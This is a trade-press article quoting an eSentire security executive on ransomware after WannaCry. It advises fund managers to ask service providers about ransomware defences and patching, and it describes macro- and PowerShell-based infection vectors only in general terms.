Sign up for free newsletter


Eldon Sprickerhoff, eSentire

Ransomware: Managers should expect the unexpected

Ransomware, malicious code that encrypts files and demands a ransom to decrypt, has been around for years, but why is this most recent version so successful? The answer is bitcoin. 

Bitcoin provides a method by which hackers may remain anonymous yet still have a way to monetise attacks without creating a money trail. But whereas most public ransomware attacks to date have tended to be low-scale and relatively unsophisticated, the Internet of Things means that billions of devices are now connected, presenting a surfeit of attack surfaces for cyber criminals.

Not only that, but the ambition of ransomware attacks has grown, as evidenced by the WannaCry event last month, which caused chaos, infecting some 300,000 computers globally.

"The most recent SEC-OCIE Risk Alert highlighted the fact that ransomware was a particularly important issue upon which firms must focus; something that I have long advocated. But there's still so much to look at because there are new versions of malware constantly evolving, week-by-week," comments Eldon Sprickerhoff (pictured), founder and chief security strategist for the cybersecurity services company eSentire Inc. 

For any fund manager, probably the most important question to ask when conducting a due diligence appraisal of their service providers, is `What are you doing to defend yourself against ransomware?' 

This might appear a simple question but consider what it takes for a ransomware attack to be successful. Approximately a dozen things have to go wrong in serial for a ransomware attack to be successful. There are technical aspects, such as email servers (both local and that of a upstream mail service provider) failing to detect the malware; there are training issues, where an employee received the malware email, clicked on it and initiated the attack inadvertently, the lack of an incident response playbook to follow, or even a backup methodology that doesn't fit the current needs of the firm. 

"Given that ransomware is a highly likely attack vector, the more fulsome a response a firm can offer their clients the better. It will give managers a pretty good sense of how well placed the service provider is to defend almost all types of cybersecurity attacks. Defence methodologies used against ransomware improve a firm's defence against insider threat, other malware threats, data extrusion threats and so on. That one question, simple as it is, covers a whole array of technical and policy/procedure considerations," says Sprickerhoff. 

To help with this, eSentire has developed a ransomware defence matrix*, detailing which mechanisms to put in place to guard against a ransomware attack.

With respect to WannaCry, it only impacted organisations who had failed to do a patch update that Microsoft had released a couple months prior to the attack. 

Microsoft runs a patch release program called Patch Tuesday; something they've been doing every month since October 2003. This March, things were different. There was more urgency. Microsoft sensed that an attack was imminent and needed to get the patch out quickly, not wait until the second Tuesday of the month.

"Even though Microsoft said these were critical patches, there didn't seem to be the heightened concern that it truly demanded and some firms treated it like any other critical patch that could wait for whatever their regular patch cadence required. In some cases, this could postpone the installation until the next quarter. Suddenly you have a scenario where firms could be susceptible to weaponised zero days discovered by the NSA," says Sprickerhoff.

There is some concern that a similar ransomware attack could bring down global exchanges and hobble the financial industry. Sprickerhoff refers to the Sapphire worm from 13 years ago. 

"It was a vulnerability discovered in Microsoft SQL; once infected, it rattled through data providers and financial institutions, flooding networks and shutting down banking machines. We are, however, so much further ahead and better protected than we were 13 years ago. I recommend that financial organisations of all sizes re-assess their incident response plans following WannaCry." 

Email remains the most favoured attack vector for ransomware. It has, however, moved on from people emailing executables to a stage where malware has become essentially fileless. 

Rather than directly download a malicious piece of code an attacker may use an different vector, such as the use of `Powershell' to download and execute code. Similarly, malicious content embedded in a benign document, such as a macro may be more difficult to discover. 

"A user may open an Office document which runs the embedded macro and inadvertently downloads the malware onto the terminal. A typical antivirus programme may not necessarily going to catch it; at a high level, this is how infection vectors have changed in the last few years and antivirus programs have not all caught up," concludes Sprickerhoff.

Financial institutions are probably better protected than any other industry but as WannaCry showed, they still have to expect the unexpected.


other gfm publications